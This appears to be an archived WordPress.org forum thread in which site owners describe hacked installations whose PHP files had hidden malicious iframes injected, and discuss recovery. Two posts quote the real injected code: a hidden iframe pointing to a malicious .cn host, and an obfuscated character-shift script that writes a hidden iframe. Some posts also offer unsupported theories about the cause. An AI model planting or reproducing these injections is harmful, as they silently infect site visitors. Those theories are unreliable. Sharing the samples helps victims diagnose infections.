WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Someone put a iframe on index.php file (20 posts)

  1. Hiuxing
    Member
    Posted 5 years ago #

    Hi.

    Today I found out that someone changed my index.php file of my WordPress blog and putted an iframe in it. So that people get a virus when they visit my website. I downloaded WordPress again and uploaded the regular index.php file.
    But my website still don't work.

    So I backed up my content and deleted everything.
    I uploaded WordPress again, but it seems that the new WordPress installation don't connect with my old MySQL database.

    What should I do?
    I don't want to lose all my content. :(

    I tried desperately everything I could do with no results.
    I hope someone can help me here.

    Thanks in advance,
    Hiuxing.

  2. Hiuxing
    Member
    Posted 5 years ago #

    My website is http://morningsundesigns.com/ btw.

  3. whooami
    Member
    Posted 5 years ago #

    restoring a backup, assuming thats what you are trying to do is no more difficult than uploading the files, to EXACTLY where they were before.

    if your wp-config.php contains the right info -- it connects.

    if it doesnt have the right info -- it doesnt.

    its not any more complicated than that.

    So if you cant connect to your database, and youve checked to make sure that it still exists, and that the tables from your old install are still intact, than your wp-config.php that you are trying to use does not have the right info in it.

  4. whooami
    Member
    Posted 5 years ago #

    oh, and btw, unless youve solved the source of your first hacking, you should expect to be hacked again.

    I suggest scanning your own local computer(s) for malware.

  5. Hiuxing
    Member
    Posted 5 years ago #

    First of all, thank you so much for replying.

    Should I empty my database too?
    Anyway, I uploaded my backup config file to my site, but it still don't work.

    I even tried installing WordPress via Fantastico installer.
    I got a brand new MySQL database and the default theme came up and worked.
    I deleted the files in my new MySQL database and inported it with the files I exported from my old MySQL.
    And now it just give me a blank page?

  6. Ryan S
    Member
    Posted 5 years ago #

    Yes.. look in your database, I think you will need to check whole database. I am not sure if there is any easy way to check this..

  7. stoneybroke
    Member
    Posted 5 years ago #

    I have been having the same problems myself with the index.php file, and others. After a lot of digging about I have found the following post http://forums.digitalpoint.com/showthread.php?t=901622 basically your site has been HACKED the hackers have somehow managed to obtain your FTP or root password so check your computer for key loggers and follow the advise in the above post and see if that will do the job.

  8. gariben
    Member
    Posted 5 years ago #

    definitely a FTP password hack.

    I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

  9. Kevin S
    Member
    Posted 5 years ago #

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specfic hack code is:
    <iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    * Gauge how often it’s happening
    * Share solutions
    * Expose the culprits, if possible
    * Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advise, and I plan to sweep my machine and those of other team members with FTP access (could be virus attached to our systems), check recent plugins, scan for virus’ on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do same.
    [link moderated]

  10. Elpie
    Member
    Posted 5 years ago #

    definitely a FTP password hack.

    I think most people who were hacked had Adobe Reader 8.0 and using FileZilla

    This is plain rubbish! I've also had sites hacked with both JavaScript injection and iframe. Not only is FTP not used, its not even enabled on the server. Interestingly, the attack vectors show that entry was gained from a core WordPress file.

    I had just written a report for the WP core devs when I saw the announcement about the release of WordPress 2.8.1.
    Everyone should upgrade as soon as possible.

    More information on known vulnerabilities (some of which have been fixed in 2.8.1) is here: http://corelabs.coresecurity.com/index.php?module=FrontEndMod&action=view&type=advisory&name=WordPress_Privileges_Unchecked

  11. bartoli3000
    Member
    Posted 5 years ago #

    I've had the same kind of issues that last few weeks. All of my indexfiles in the root were altered and all of my php files were changed. They had the following "script" added at the bottom end:

    ===
    ?php echo '<script>var source="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4Djgsbnf&31tsd&4E&33iuuq&4B00gpytfnqsptu/sv0jo/dhj&4G5&33&31xjeui&4E&331&33&31ifjhiu&4E&331&33&31tuzmf&4E&33ejtqmbz&4Bopof&4C&33&4F&4D0jgsbnf&4F(**<=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result);</script>'; ?>
    ===

    The result was that my site went totally blank, even no error at all. After removing the "script", the site was back ok. But only for a few days, even hours later, the "script" was back. I did some changes; wp_ changed, file security 644, installed the security plugin, but with no result, the hacks came back.

    I just did the upgrade to 281 and I keep my fingers crossed...

  12. bartoli3000
    Member
    Posted 5 years ago #

    Ok, I'm back with more news.

    After upgrading to 281 I got hacked again...

    I manually scanned with Avast my pc, and I did found some worms and malware in my IE cache, which i suspect did the damage on my website on the first place. Then i changed all of my passwords (sql, ftp, ...) and had no more intrusions since.

  13. gariben
    Member
    Posted 5 years ago #

    @baroli3000
    do you have Adobe Reader installed? if so, what version?

  14. Hiuxing
    Member
    Posted 5 years ago #

    Thanks for all reply.
    It's solved and I'm really happy that it is not happening anymore! :D

    Thanks a lot again!

  15. cyberhrc
    Member
    Posted 5 years ago #

    no adobe reader here nor filezilla
    2.8.1 wordpress up and still problems with geting iframe script
    ftp pass is chaned, PC is clean ....

    hope for better days

  16. Kevin S
    Member
    Posted 5 years ago #

    it was not hacked our wordpress blog but WordPress main server was hacked and variability was already installed before downloading from WordPress server. All the details regarding this hack is reviewed in magazine called Linux. WordPress main server was hacked and injected malicious.

    [link moderated]

  17. annaj
    Member
    Posted 5 years ago #

    Huh, I have got this smae problem but I have got this same problem with forum (SMF) php and html files (index, home and similar).
    I scanned my computer and removed all malicius programs (trojans, adware, malware, key-loggers, *sniffers*) and registry, but still no chaged ;(
    No IE used, just Fx 3.5.1, Adobe Reader 8, no FileZilla just TotalCommander (but attacks was first than I used TC to login to FTP).
    WP version after upgrade (in first attack) was 2.7.1, since 21st July 2.8.2 - upgrade by cPanel...

    Any solusions?

  18. gohlkus
    Member
    Posted 5 years ago #

    Our site has been hacked several times in at least the last week.

    I don't know how they're injecting it, but they were using a php file in the media uploads folder, and now the suspicious activity may be in the podpress plugin.

    I changed the passwords and upgraded to 2.8.2 and deleted the offending files. Unfortunately I have no idea how to diagnose where they're getting in.

  19. syncbox
    Member
    Posted 5 years ago #

    Read the sticky thread regarding podpress and gOOgle.net infections/malware...

  20. thetanooki
    Member
    Posted 4 years ago #

    Oh the off-chance any of you check this topic again, how did you go about fixing the blank pages?

    I seem to have had a similar iframe virus affect my site. I've changed the passwords and uploaded/installed a clean version of the latest WordPress. It seems all fine and dandy now until I import my old database, after which point all my pages go completely blank. (This was happening to the previously existing site too, almost as soon as the virus hit.)

    Some of you mentioned this being a script at the end of your PHP files, but this is clearly a database issue for me. Still, I'd like to know what you did in your scenario to solve it.

Topic Closed

This topic has been closed to new replies.

About this Topic